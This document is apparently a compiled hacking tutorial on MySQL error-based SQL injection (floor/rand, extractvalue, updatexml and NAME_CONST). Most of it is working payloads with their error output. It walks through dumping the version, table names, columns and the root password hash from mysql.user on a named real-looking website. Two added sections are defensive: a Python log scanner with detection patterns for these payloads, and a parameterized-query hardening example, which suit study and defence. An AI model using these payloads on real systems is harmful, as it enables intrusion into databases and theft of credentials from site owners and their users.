1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Why this errors: rand(0) is seeded and therefore yields a fixed sequence, and MySQL evaluates the GROUP BY key once to look up the group and again when it inserts a new group into its temporary table, so the key values 0,1,1,0,... collide within the first few rows and the temporary table raises a duplicate-key error whose key text contains whatever was concatenated in front of the floor() value.

Example. First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked in the error message. To read other data, replace version() with the expression to query.

For example, to retrieve the administrator's user name and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
More collected examples (NAME_CONST):

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
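As an added example (not part of the original post), here is a small Python scanner that recognises the four error-based payload shapes collected above (floor(rand(0)*2) with GROUP BY, EXTRACTVALUE, UPDATEXML, and a NAME_CONST name used twice) in web-server access logs, and that flags the MySQL error strings these techniques need to see reflected in a response. The log lines, the signature names and the function names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original page): one benign request, one request per
# error-based technique described above, and one benign search that merely contains the words
# "floor" and "rand", which a naive keyword match would flag.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 88
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,(select+user()))) HTTP/1.1" 500 70
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /article.php?id=1+and+1=(updatexml(1,concat(0x3a,(select+user())),1)) HTTP/1.1" 500 70
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 60
10.0.0.6 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?q=floor+plan+rand HTTP/1.1" 200 1024
"""

# A technique is reported only when every fragment of its signature occurs in the decoded query.
SIGNATURES = {
    "floor_rand_groupby": [r"floor\s*\(\s*rand\s*\(", r"group\s+by"],
    "extractvalue": [r"\bextractvalue\s*\("],
    "updatexml": [r"\bupdatexml\s*\("],
    "name_const_dup": [r"name_const\s*\(.*name_const\s*\("],  # two columns named by NAME_CONST
}

# Error text that, once it reaches a client, tells an attacker the injected expression was evaluated.
LEAKED_ERROR = re.compile(
    r"duplicate entry '.*' for key 'group_key'|xpath syntax error|duplicate column name", re.I)

LOG_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify_query(raw_path):
    """Return the technique names whose fragments all occur in the URL-decoded query string."""
    query = raw_path.partition("?")[2]
    decoded = re.sub(r"\s+", " ", unquote_plus(query)).lower()
    return [name for name, parts in SIGNATURES.items()
            if all(re.search(p, decoded) for p in parts)]

def scan_log(text):
    """Return (line number, HTTP status, techniques) for each request that matches a signature."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_LINE.search(line)
        if m and (found := classify_query(m.group(1))):
            hits.append((n, int(m.group(2)), found))
    return hits

def leaks_db_error(response_body):
    """True when a response body carries one of the MySQL error strings these techniques rely on."""
    return bool(LEAKED_ERROR.search(response_body))
```

Running scan_log(SAMPLE_LOG) reports lines 2 to 5 with one technique each and stays silent on the benign "floor plan" search; pairing a hit with a 500 status or a leaks_db_error() match on the response is a strong sign the injected expression was actually evaluated.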
Error-based injection on newer MySQL versions: injecting with NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the NAME_CONST method. There are not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1);

|---------------|
| TEST          |
|---------------|
| 1             |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... &sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = your MySQL variable.

MySQL 5.1.3 Server System Variables

Both NAME_CONST() columns of the derived table x receive the same name, so MySQL refuses the query with a "Duplicate column name" error that quotes that name, which is exactly the value of VAR.

Let's try it out on my site:

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST when trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. That is the constraint quoted above: the arguments should be constants, and MySQL builds that enforce it will not accept a subquery as the name. Luckily, it works here, so let's get this going again.

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column '1' error:

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table:

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this (0x6d7973716c is 'mysql' and 0x75736572 is 'user' in hex), and I get the duplicate column name 'Host':

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this (0x207e20 is the separator ' ~ '):

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
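Every technique on this page works only because the application splices the id parameter into the SQL text and hands the raw MySQL error back to the client. As an added example (not the original post's code), the following Python contrasts that pattern with the hardened form for the page's `select * from article where id = 1` query; it uses an in-memory sqlite3 table named `article` as a constructed stand-in for the MySQL table, and the function names vulnerable_lookup and safe_lookup are assumptions made for the example.

```python
import logging
import sqlite3

def make_db():
    """Constructed stand-in for the page's `article` table (sqlite3 so the example runs offline)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table article (id integer primary key, title text, content text)")
    db.execute("insert into article values (1, 'test', 'do it')")
    return db

def vulnerable_lookup(db, user_id):
    """The pattern the page exploits: the parameter is spliced into the SQL text and the raw
    database error is returned to the client, so any error-based payload gets its error reflected."""
    try:
        return db.execute(f"select * from article where id = {user_id}").fetchall()
    except sqlite3.Error as e:
        return f"ERROR: {e}"          # leaks the database's own message, as in the page's examples

def safe_lookup(db, user_id):
    """Hardened form: validate the type, bind the value as a parameter, and never send the
    database error text to the client (it goes to the server log instead)."""
    try:
        uid = int(user_id)            # "1 and (select ...)" is not an integer and is rejected here
    except ValueError:
        return "bad request"
    try:
        return db.execute("select * from article where id = ?", (uid,)).fetchall()
    except sqlite3.Error as e:
        logging.error("article lookup failed: %s", e)   # detail stays server-side
        return "internal error"

if __name__ == "__main__":
    db = make_db()
    payload = "1 and (select 1 from nosuchtable)"   # constructed input that forces a DB error
    print(vulnerable_lookup(db, payload))   # the unknown table name comes back inside the error text
    print(safe_lookup(db, payload))         # -> bad request
    print(safe_lookup(db, "1"))             # -> [(1, 'test', 'do it')]
```

With bound parameters the injected text can never reach the SQL parser, and with a generic client-side error message even a query that does fail gives the attacker nothing to read.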